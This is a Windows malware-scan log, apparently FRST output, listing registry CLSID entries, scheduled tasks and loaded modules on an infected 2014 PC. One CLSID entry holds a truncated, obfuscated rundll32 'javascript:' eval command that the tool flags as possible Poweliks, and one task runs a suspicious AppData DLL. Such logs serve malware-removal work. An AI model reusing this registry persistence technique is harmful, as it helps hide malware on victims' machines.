CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{0E75A0CB-0072-450A-8AF2-D56B82045B4F}\InprocServer32 -> Q:\Program Files\AliWangWang\7.00.07C\SDKDB.dll (Alibaba software (Shanghai) Corporation.)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{22181302-A8A6-4F84-A541-E5CBFC70CC43}\localserver32 -> C:\Users\THINK\AppData\Local\Google\Update\1.3.24.15\GoogleUpdateOnDemand.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{2F0E2680-9FF5-43C0-B76E-114A56E93598}\localserver32 -> C:\Users\THINK\AppData\Local\Google\Update\1.3.24.15\GoogleUpdateOnDemand.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{33b07fd4-5917-43e1-968d-4c79231836bf}\localserver32 -> C:\Program Files\Google\Google Talk\googletalk.exe (Google)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{38943A5A-33BB-4D28-909A-BF52B994D26A}\InprocServer32 -> C:\ProgramData\CBox\CCTVPlayer.ocx (CCTV.COM)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{39125640-8D80-11DC-A2FE-C5C455D89593}\InprocServer32 -> C:\Users\THINK\AppData\Local\Google\Google Talk Plugin\googletalkax.dll (Google)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{51F9E8EF-59D7-475B-A106-C7EA6F30C119}\localserver32 -> C:\Users\THINK\AppData\Local\Google\Update\1.3.24.15\GoogleUpdateOnDemand.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{6777375D-DD17-46FF-A4E4-9650C00D5D92}\InprocServer32 -> Q:\Program Files\AliWangWang\7.00.07C\SDKDB.dll (Alibaba software (Shanghai) Corporation.)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{679F137C-3162-45da-BE3C-2F9C3D093F64}\InprocServer32 -> C:\windows\system32\shdocvw.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{6E73CA04-CE63-11CF-B59C-0000929132CE}\localserver32 -> C:\Users\THINK\Desktop\SigmaPlot\Spw.exe (Systat Software, Inc.)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{6E73CA51-CE63-11CF-B59C-0000929132CE}\localserver32 -> C:\Users\THINK\Desktop\SigmaPlot\Spw.exe (Systat Software, Inc.)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{6E73CA52-CE63-11CF-B59C-0000929132CE}\localserver32 -> C:\Users\THINK\Desktop\SigmaPlot\Spw.exe (Systat Software, Inc.)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\THINK\AppData\Local\Google\Update\1.3.24.15\psuser.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{A8F086C3-2497-4229-82FE-586F2D326F95}\localserver32 -> C:\Program Files\Google\Google Talk\googletalk.exe (Google)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{AB9F4455-E591-4132-A386-0B91EAEDB96C}\InprocServer32 -> C:\Users\THINK\AppData\Local\Google\Google Talk Plugin\o1dax.dll (Google)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{AC414988-E5BB-4C2C-873B-EA53D2F3D23A}\InprocServer32 -> C:\ProgramData\CBox\CCTVUpdateInstall.dll (CCTV International Networks Co.,Ltd)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{C3101A8B-0EE1-4612-BFE9-41FFC1A3C19D}\InprocServer32 -> C:\Users\THINK\AppData\Local\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{C442AC41-9200-4770-8CC0-7CDB4F245C55}\InprocServer32 -> C:\Users\THINK\AppData\Local\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{C728DAB8-FDF5-4CD7-89DD-879D25794C77}\InprocServer32 -> C:\ProgramData\CBox\CCTVPlayer.ocx (CCTV.COM)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{d33f3ced-d7d5-44f1-a9fe-6927dabb1934}\localserver32 -> C:\Program Files\Google\Google Talk\googletalk.exe (Google)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{D4FEDB83-B705-497F-8707-6CA53D69FF9B}\InprocServer32 -> Q:\Program Files\AliWangWang\7.00.07C\SDKDB.dll (Alibaba software (Shanghai) Corporation.)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{E67BE843-BBBE-4484-95FB-05271AE86750}\localserver32 -> C:\Users\THINK\AppData\Local\Google\Update\1.3.24.15\GoogleUpdateOnDemand.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{E7995762-8578-5C33-CB25-4104B87CB7E7}\InprocServer32 -> C:\Windows\system32\ole32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\THINK\AppData\Local\Google\Update\1.3.24.15\psuser.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\THINK\AppData\Roaming\Dropbox\bin\DropboxExt.19.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\THINK\AppData\Roaming\Dropbox\bin\DropboxExt.19.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\THINK\AppData\Roaming\Dropbox\bin\DropboxExt.19.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\THINK\AppData\Roaming\Dropbox\bin\DropboxExt.19.dll (Dropbox, Inc.)
 
==================== Restore Points  =========================
 
15-09-2014 07:20:53 计划的检查点
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2014-07-20 14:51 - 2014-09-14 16:20 - 00000027 ____A C:\windows\system32\Drivers\etc\hosts
127.0.0.1       localhost
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {085B50D9-E13A-4128-8C6D-ADA8D83AC38C} - \cdv No Task File <==== ATTENTION
Task: {10CE3C52-7A39-40F9-9F6D-22E6535A9FC9} - \AliUpdater{34C042BE-B09C-4D52-BD15-A8987411D03C} No Task File <==== ATTENTION
Task: {10E9D515-0455-4CDC-8E32-B1072030F540} - \At22 No Task File <==== ATTENTION
Task: {155723BA-60E2-4354-93AF-84EAC8D3C2D8} - System32\Tasks\Microsoft\Windows\Wireless\GatherWirelessInfo => C:\windows\system32\gatherWirelessInfo.vbs [2008-01-20] ()
Task: {177FDC6C-D518-4454-B318-14933EC0D66F} - \Adobe Flash Player Updater No Task File <==== ATTENTION
Task: {1DCEFFB9-CCA2-4265-BAC6-05C2599446ED} - \GoogleUpdateTaskMachineCore No Task File <==== ATTENTION
Task: {21EDAE60-37AC-4F29-9303-EE7AC2CBB46E} - \At13 No Task File <==== ATTENTION
Task: {22E1772E-7DFE-4C5F-841F-1C93FD5D82A4} - System32\Tasks\Microsoft\Windows\NetworkAccessProtection\NAPStatus UI
Task: {29C88B5A-02BE-4573-B516-4E936EA08D64} - \At35 No Task File <==== ATTENTION
Task: {2DE18FE4-6467-484F-8431-206702EC5546} - System32\Tasks\Microsoft\Windows\RAC\RACAgent => C:\windows\system32\RacAgent.exe [2008-01-20] (Microsoft Corporation)
Task: {2E5B7D97-F14C-4CFF-864E-620AABA892D1} - System32\Tasks\Microsoft\Windows\Shell\CrawlStartPages
Task: {324F922B-8D91-4231-8F6A-4A9E31F59521} - \PMTask No Task File <==== ATTENTION
Task: {3288D09C-74DE-44E6-A868-7D4F23627AF0} - System32\Tasks\ASC7_SkipUac_THINK => Q:\Program Files\IObit\Advanced SystemCare 7\ASC.exe [2014-05-29] (IObit)
Task: {366A9D37-14B2-498D-B08C-9BD0546582C2} - \At8 No Task File <==== ATTENTION
Task: {375BAF51-DD22-406D-B8D3-7CD66043BCCC} - \At3 No Task File <==== ATTENTION
Task: {39186DE0-5863-4438-ACE3-CA139756A232} - \At49 No Task File <==== ATTENTION
Task: {3BB73B66-1CEE-46C2-BCE9-C84020BC2A4F} - System32\Tasks\ScanToPCActivationApp.exe_{72BA9741-FB3E-4B44-A845-33E8FCE77E44} => C:\Program Files\HP\HP Officejet Pro 8600\Bin\ScanToPCActivationApp.exe [2012-10-17] (Hewlett-Packard Co.)
Task: {3E39729E-3618-4D71-9664-10A633DD5B4F} - \At27 No Task File <==== ATTENTION
Task: {3E82C0D3-7BFC-4D71-971B-5E753E9F6130} - \{0B031F8E-669B-4B52-ACD6-4E81E492AD09} No Task File <==== ATTENTION
Task: {3EEABAB9-E304-4E27-8EEA-04F5AB1E905B} - \At20 No Task File <==== ATTENTION
Task: {3FACA755-D34A-4D96-9D3C-D4BAA5DB19A0} - \At12 No Task File <==== ATTENTION
Task: {3FD1A352-1D84-4099-B4EB-B0F4AC402618} - \At51 No Task File <==== ATTENTION
Task: {3FF21C17-8F18-48AD-8270-C8518D4B8EE1} - \{02989E67-A55E-4BD5-BE40-C552CC742D07} No Task File <==== ATTENTION
Task: {417ADD3A-621C-45D5-8151-74160C7B725A} - \At16 No Task File <==== ATTENTION
Task: {4237464F-3E47-4C1D-8285-1E21C40AAE67} - System32\Tasks\{AF5E48FE-C0D2-FAE1-AFA0-F804CFB8B7DB} => C:\Users\THINK\AppData\Roaming\wygiusy.dll/s "C:\Users\THINK\AppData\Roaming\wygiusy.dll"
Task: {4340A5ED-D5B4-4EE0-9CB9-77A408E23D4C} - System32\Tasks\Microsoft\Windows\Tcpip\WSHReset => C:\windows\system32\netsh.exe [2006-11-02] (Microsoft Corporation)
Task: {487E3789-53F7-44E5-B5E3-85B194D4BE47} - \At42 No Task File <==== ATTENTION
Task: {49541105-569C-4F8A-91A3-F0BCC27506C1} - \v No Task File <==== ATTENTION
Task: {4B2A47B4-C38F-4752-BB6B-E990EC0944E1} - \At46 No Task File <==== ATTENTION
Task: {4BCB0524-EBDB-48F3-AF7A-DB7979C7605C} - \sd No Task File <==== ATTENTION
Task: {4D72741E-769C-45DB-8604-CB8EBDADAA29} - System32\Tasks\Microsoft\Windows\MobilePC\TMM
Task: {4DACE6B3-7810-4D10-A8D2-76681F0E4437} - \At47 No Task File <==== ATTENTION
Task: {515A1E50-86FD-437D-B596-CA2E47DFFF3C} - \At6 No Task File <==== ATTENTION
Task: {54D1716C-39A3-4368-9989-745312F072D0} - \Microsoft\Windows\WindowsCalendar\Reminders - THINK No Task File <==== ATTENTION
Task: {54D21B7D-3D70-4508-94B2-56FE25360C3B} - \At34 No Task File <==== ATTENTION
Task: {561D7B57-14FD-4279-B8D4-25A3EFD6BAE3} - \SogouImeMgr No Task File <==== ATTENTION
Task: {56C5C777-3174-404E-A04A-65086E3EBB24} - \At60 No Task File <==== ATTENTION
Task: {58CD6498-48AA-4B24-8A68-D0D11E1A0B4A} - \At25 No Task File <==== ATTENTION
Task: {5B231164-B4BF-41F8-A5C8-7696CE125E83} - \At55 No Task File <==== ATTENTION
Task: {5E2657B5-FE08-45DE-A5C6-C31F5CCFF21D} - \At5 No Task File <==== ATTENTION
Task: {6067899C-1F6F-4964-A2D6-134A24B9A05F} - \At28 No Task File <==== ATTENTION
Task: {616173A5-413A-40E3-AE26-C60E78B81BE6} - \At59 No Task File <==== ATTENTION
Task: {61BE53CD-82AD-4FCE-BC29-6A9155E93C33} - \At32 No Task File <==== ATTENTION
Task: {63E1478A-1547-4166-A4AA-90277B91DBB4} - \At9 No Task File <==== ATTENTION
Task: {69DFE260-91D9-4F9D-B20E-6CF56F065C37} - \At17 No Task File <==== ATTENTION
Task: {6C3ADDE8-45ED-447E-8931-0C67839E4194} - \At38 No Task File <==== ATTENTION
Task: {6CA694AE-D0CC-4B47-9A20-D3CA818F0819} - \DealPly No Task File <==== ATTENTION
Task: {6E7D09EB-CB15-433F-84BD-4B95118643FA} - \At57 No Task File <==== ATTENTION
Task: {70CC8A02-3C65-414C-8439-B1F25C75BC41} - \At41 No Task File <==== ATTENTION
Task: {712C7A4A-D663-4CA9-85F4-94105FCCAFC6} - \GoogleUpdateTaskUserS-1-5-21-55330172-1766457534-1491637609-1000UA No Task File <==== ATTENTION
Task: {732E3685-4455-47A0-AB8E-8B329E3B972E} - \At7 No Task File <==== ATTENTION
Task: {7854DE68-10DC-4882-9615-82A5F55971F9} - \HPCustParticipation HP Officejet Pro 8600 No Task File <==== ATTENTION
Task: {7884677C-BA8C-40C1-A97F-A2230951ECE1} - \At33 No Task File <==== ATTENTION
Task: {7B2874C9-55C5-4C2C-B26E-DF74A9B10A62} - \At23 No Task File <==== ATTENTION
Task: {8338E6EE-D3A4-4D6E-8B46-DA5D94BEFE1C} - \At26 No Task File <==== ATTENTION
Task: {83624475-3538-453B-89FD-E179E8F8413E} - \User_Feed_Synchronization-{918EC6E0-34B2-4DDA-906B-3C6EBC8C1F27} No Task File <==== ATTENTION
Task: {881F37CA-F140-4ADA-8398-C3F74162C131} - \At29 No Task File <==== ATTENTION
Task: {89DB9615-2A9C-40DB-919D-2B1DA8DD7F54} - \At44 No Task File <==== ATTENTION
Task: {8ED6212C-9CA2-4B5A-A14C-0B0B896C2D0D} - \At18 No Task File <==== ATTENTION
Task: {95C540F2-A9AF-4BE4-B7F5-8C88A898F006} - \GoogleUpdateTaskUserS-1-5-21-55330172-1766457534-1491637609-1000Core No Task File <==== ATTENTION
Task: {96EC3B33-48CC-418C-BB5C-0EBF8AF7314F} - \At45 No Task File <==== ATTENTION
Task: {992FB703-E483-4357-850E-4C49FBCB6FB8} - \360SuperKiller\360SuperKiller No Task File <==== ATTENTION
Task: {9ADBAAA9-4FDE-441D-8044-A19B94E756FD} - \At24 No Task File <==== ATTENTION
Task: {9BEDCD9D-B648-40EA-86F6-8B4AC3746351} - \At1 No Task File <==== ATTENTION
Task: {A1AF9806-B2A5-41C9-A8C2-57C370CDA504} - \At58 No Task File <==== ATTENTION
Task: {A8E39604-473F-401C-8C86-94A2B2489A77} - \At56 No Task File <==== ATTENTION
Task: {AD9E42A7-A381-4B03-BDC7-4A73045986FC} - \At40 No Task File <==== ATTENTION
Task: {B0AA658E-DF28-4F75-B41E-FAE0FF9BFE72} - \GoogleUpdateTaskMachineUA No Task File <==== ATTENTION
Task: {B66DBDD8-1116-49FC-9F2F-C5EAE5CED3AE} - \At54 No Task File <==== ATTENTION
Task: {B7C0B9A7-9ADB-49E1-80E7-19B1677FF97B} - \At39 No Task File <==== ATTENTION
Task: {BB244145-58AE-4E64-BF70-F0563A8CCA4C} - \OGALogon No Task File <==== ATTENTION
Task: {C13E7B30-5F36-41C2-A1AC-E69713FA2F6E} - \At11 No Task File <==== ATTENTION
Task: {C2F6D54C-D000-44E5-9968-C170E1504084} - System32\Tasks\Uninstaller_SkipUac_Administrator => q:\Program Files\IObit\IObit Uninstaller\IObitUninstaler.exe [2014-05-06] (IObit)
Task: {C5143DA2-538B-45EA-9229-220AEA4F2D40} - \At36 No Task File <==== ATTENTION
Task: {C5294896-018C-4197-A27A-64F68E968012} - \{656C7DFC-BB01-4A4C-89A7-58A0755573D0} No Task File <==== ATTENTION
Task: {C62FE94D-E9FC-43A9-8BD8-DCA492B53B03} - \At52 No Task File <==== ATTENTION
Task: {C67A0E9C-FED6-4F35-8030-894FDC1F97C9} - \At19 No Task File <==== ATTENTION
Task: {CD9391F5-D592-4CE7-A40B-5A06722A016B} - \ddddd No Task File <==== ATTENTION
Task: {CF7EDD10-2A3A-4DBD-9697-BFB475016C03} - \At61 No Task File <==== ATTENTION
Task: {D3B3AF92-98C1-4A32-83D4-3F2FAFAED5C1} - \At14 No Task File <==== ATTENTION
Task: {D4A64EE1-EE91-479F-9FDB-1E7445B6B35F} - \At50 No Task File <==== ATTENTION
Task: {D5AF7A18-00C7-405F-82EF-731B875FD81F} - \At53 No Task File <==== ATTENTION
Task: {D6964A31-FA9A-4568-8E7A-101B2E16CC05} - \At30 No Task File <==== ATTENTION
Task: {D7EF08D1-D7BD-4A6E-88FC-1F23F14FFA84} - \At2 No Task File <==== ATTENTION
Task: {D8681049-81DA-430E-A862-7528A9A9EF3F} - \OGADaily No Task File <==== ATTENTION
Task: {D938C1CB-3349-4185-B1B7-AB0B20402FE6} - \d No Task File <==== ATTENTION
Task: {DE533FA1-AB74-4344-B334-8CB9F7DC1110} - \{F1E1A888-3E56-4C53-BC4A-E141EC277CA9} No Task File <==== ATTENTION
Task: {E3DF1691-40C7-4AC1-81E7-D6A9C467EA65} - \At10 No Task File <==== ATTENTION
Task: {E45B2265-0C2F-4ADD-B01C-00816EFA8433} - \KwSingRunAsStdUser Task21963 No Task File <==== ATTENTION
Task: {E6D81A80-5011-4A9B-80D9-C7E9A51C0AB5} - \At37 No Task File <==== ATTENTION
Task: {EF2FEA48-9D94-4F78-AADC-8A093787228A} - \At15 No Task File <==== ATTENTION
Task: {F2BF07C5-4665-4C52-A25E-8E85480DC658} - \At31 No Task File <==== ATTENTION
Task: {F55CDFC9-2744-47A1-B755-9740301C6C99} - \Microsoft\Windows Defender\MP Scheduled Scan No Task File <==== ATTENTION
Task: {F840E8E7-7427-4427-8725-1585B6B08BB2} - \count-down shutdown No Task File <==== ATTENTION
Task: {FA0701D7-E87F-4467-9DA2-FF8751C79B00} - \At48 No Task File <==== ATTENTION
Task: {FA6B0B07-07A8-48F0-910F-BF8847A6F63F} - \At21 No Task File <==== ATTENTION
Task: {FA6F8CE2-48A9-4AAF-B8B3-0848613307A2} - \At43 No Task File <==== ATTENTION
Task: {FF4303A8-084A-404D-A5A0-9DC4B7B77C86} - \At4 No Task File <==== ATTENTION
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\windows\Tasks\Adobe Flash Player Updater.job => C:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe
 
==================== Loaded Modules (whitelisted) =============
 
2014-09-13 23:57 - 2010-10-20 22:19 - 00140696 _____ () q:\Program Files\Keniu\ConewRsc\conewrsc.exe
2014-09-13 23:57 - 2010-10-21 14:23 - 00353800 _____ () q:\Program Files\Keniu\ConewRsc\sqlite.dll
2010-12-10 07:10 - 2010-12-10 07:10 - 01118208 _____ () C:\Program Files\Lenovo\Rescue and Recovery\rrpservice.exe
2009-09-10 02:33 - 2007-06-18 04:28 - 00056056 ____N () C:\windows\system32\DLAAPI_W.DLL
2010-07-04 17:32 - 2010-07-04 17:32 - 00010752 _____ () q:\Program Files\Unlocker\UnlockerCOM.dll
2014-03-19 18:58 - 2014-03-19 18:58 - 00198088 _____ () Q:\Program Files\BaiduYunGuanjia\YunShellExt.dll
2009-09-11 06:23 - 2009-08-16 05:06 - 00141312 _____ () Q:\WinRAR\rarext.dll
2010-01-05 20:21 - 2008-02-25 09:51 - 00069632 _____ () q:\Program Files\IDM Computer Solutions\UltraEdit-32\ue32ctmn.dll
2011-07-01 02:48 - 2011-07-01 02:48 - 00043520 ____N () C:\Windows\system32\CmdLineExt03.dll
2003-07-10 14:08 - 2003-07-10 14:08 - 00029768 _____ () C:\Program Files\Common Files\microsoft shared\Web Folders\2052\NSEXTINT.DLL
2011-01-24 13:35 - 2011-01-24 13:35 - 00132384 _____ () C:\Program Files\ThinkPad\Bluetooth Software\btkeyind.dll
2014-09-10 23:45 - 2014-09-10 23:45 - 00129640 _____ () q:\Program Files\SogouInput\6.1.0.6700\SogouInput\Components\SgAppender\1.0.0.207\SgAppender_Dll.dll
2010-05-05 05:21 - 2010-05-05 05:21 - 00023040 ____N () C:\Windows\system32\atitmpxx.dll
2010-12-10 07:01 - 2010-12-10 07:01 - 00139264 _____ () C:\Program Files\Lenovo\Rescue and Recovery\CDRecord.dll
2011-11-02 00:26 - 2011-11-02 00:26 - 00087912 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2011-11-02 00:26 - 2011-11-02 00:26 - 01242472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2014-07-22 00:10 - 2014-07-15 05:24 - 08537928 _____ () C:\Program Files\Google\Chrome\Application\36.0.1985.125\pdf.dll
2014-07-22 00:10 - 2014-07-15 05:24 - 00353096 _____ () C:\Program Files\Google\Chrome\Application\36.0.1985.125\ppGoogleNaClPluginChrome.dll
2014-07-22 00:10 - 2014-07-15 05:24 - 01732936 _____ () C:\Program Files\Google\Chrome\Application\36.0.1985.125\ffmpegsumo.dll
2014-04-11 14:22 - 2014-02-10 13:44 - 04592128 _____ () C:\Users\THINK\AppData\Local\Google\Chrome\User Data\SwiftShader\3.2.6.45159\libglesv2.dll
2014-04-11 14:22 - 2014-02-10 13:44 - 00112128 _____ () C:\Users\THINK\AppData\Local\Google\Chrome\User Data\SwiftShader\3.2.6.45159\libegl.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00417280 _____ () Q:\Program Files\Winamp\nsutil.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00080384 _____ () Q:\Program Files\Winamp\nde.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00022016 _____ () Q:\Program Files\Winamp\nxlite.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00024576 _____ () Q:\Program Files\Winamp\System\albumart.w5s
2013-03-09 00:09 - 2014-07-28 19:10 - 00173568 _____ () Q:\Program Files\Winamp\System\auth.w5s
2013-03-09 00:09 - 2014-07-28 19:10 - 00019968 _____ () Q:\Program Files\Winamp\System\bmp.w5s
2013-03-09 00:09 - 2014-07-28 19:10 - 00064512 _____ () Q:\Program Files\Winamp\zlib.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00044544 _____ () Q:\Program Files\Winamp\System\devices.w5s
2013-03-09 00:09 - 2014-07-28 19:10 - 00016896 _____ () Q:\Program Files\Winamp\System\dlmgr.w5s
2013-03-09 00:09 - 2014-07-28 19:10 - 00014336 _____ () Q:\Program Files\Winamp\System\filereader.w5s
2013-03-09 00:09 - 2014-07-28 19:10 - 00019456 _____ () Q:\Program Files\Winamp\System\gif.w5s
2013-03-09 00:09 - 2014-07-28 19:10 - 00016384 _____ () Q:\Program Files\Winamp\System\gracenote.w5s
2013-03-09 00:09 - 2014-07-28 19:10 - 00624128 _____ () Q:\Program Files\Winamp\System\jnetlib.w5s
2013-03-09 00:09 - 2014-07-28 19:10 - 00154624 _____ () Q:\Program Files\Winamp\System\jpeg.w5s
2013-03-09 00:09 - 2014-07-28 19:10 - 00087552 _____ () Q:\Program Files\Winamp\System\playlist.w5s
2013-03-09 00:09 - 2014-07-28 19:10 - 00088064 _____ () Q:\Program Files\Winamp\System\png.w5s
2013-03-09 00:09 - 2014-07-28 19:10 - 00013824 _____ () Q:\Program Files\Winamp\System\primo.w5s
2013-03-09 00:09 - 2014-07-28 19:10 - 00022016 _____ () Q:\Program Files\Winamp\System\tagz.w5s
2013-03-09 00:09 - 2014-07-28 19:10 - 00038912 _____ () Q:\Program Files\Winamp\System\timer.w5s
2013-03-09 00:09 - 2014-07-28 19:10 - 00043008 _____ () Q:\Program Files\Winamp\System\wasabi2.w5s
2013-03-09 00:09 - 2013-03-09 00:09 - 00607232 _____ () Q:\Program Files\Winamp\Components\cloud.w6c
2013-03-09 00:09 - 2014-07-28 19:10 - 00626688 _____ () Q:\Program Files\Winamp\jnetlib.dll
2013-03-09 00:09 - 2013-03-09 00:09 - 00018432 _____ () Q:\Program Files\Winamp\Components\ssdp.w6c
2013-03-09 00:09 - 2014-07-28 19:10 - 00090624 _____ () Q:\Program Files\Winamp\System\xml.w5s
2013-03-09 00:09 - 2014-07-28 19:10 - 00068096 _____ () Q:\Program Files\Winamp\Plugins\in_avi.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00102400 _____ () Q:\Program Files\Winamp\Plugins\in_cdda.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00072704 _____ () Q:\Program Files\Winamp\Plugins\in_dshow.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00066048 _____ () Q:\Program Files\Winamp\Plugins\in_flac.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00043008 _____ () Q:\Program Files\Winamp\Plugins\in_flv.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00007168 _____ () Q:\Program Files\Winamp\Plugins\in_linein.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00109568 _____ () Q:\Program Files\Winamp\Plugins\in_midi.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00050176 _____ () Q:\Program Files\Winamp\Plugins\in_mkv.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00164864 _____ () Q:\Program Files\Winamp\Plugins\in_mod.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00294400 _____ () Q:\Program Files\Winamp\Plugins\in_mp3.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00054272 _____ () Q:\Program Files\Winamp\Plugins\in_mp4.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00075776 _____ () Q:\Program Files\Winamp\Plugins\in_nsv.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00023552 _____ () Q:\Program Files\Winamp\Plugins\in_swf.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00253952 _____ () Q:\Program Files\Winamp\Plugins\in_vorbis.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00016896 _____ () Q:\Program Files\Winamp\Plugins\in_wave.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00253440 _____ () Q:\Program Files\Winamp\libsndfile.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00313856 _____ () Q:\Program Files\Winamp\Plugins\in_wm.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00022528 _____ () Q:\Program Files\Winamp\Plugins\out_disk.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00052736 _____ () Q:\Program Files\Winamp\Plugins\out_ds.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00019456 _____ () Q:\Program Files\Winamp\Plugins\out_wave.dll
2009-04-28 16:20 - 2014-07-28 19:10 - 00040448 _____ () Q:\Program Files\Winamp\Plugins\dsp_sps.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 01794560 _____ () Q:\Program Files\Winamp\Plugins\gen_ff.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00088576 _____ () Q:\Program Files\Winamp\tataki.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00344576 _____ () Q:\Program Files\Winamp\Plugins\freeform\wacs\freetype\freetype.wac
2013-03-09 00:09 - 2014-07-28 19:10 - 00028160 _____ () Q:\Program Files\Winamp\Plugins\gen_hotkeys.dll
2013-01-01 22:13 - 2014-07-28 19:10 - 00189440 _____ () Q:\Program Files\Winamp\Plugins\gen_jumpex.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00325120 _____ () Q:\Program Files\Winamp\Plugins\gen_ml.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00305664 _____ () Q:\Program Files\Winamp\Plugins\ml_local.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00086528 _____ () Q:\Program Files\Winamp\Plugins\ml_playlists.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00097280 _____ () Q:\Program Files\Winamp\Plugins\ml_cloud.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00250368 _____ () Q:\Program Files\Winamp\Plugins\ml_devices.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00124928 _____ () Q:\Program Files\Winamp\Plugins\ml_online.dll
2013-03-09 00:09 - 2014-07-28 19:10 - 00275456 _____ () Q:\Program Files\Winamp\Plugins\ml_pmp.dll
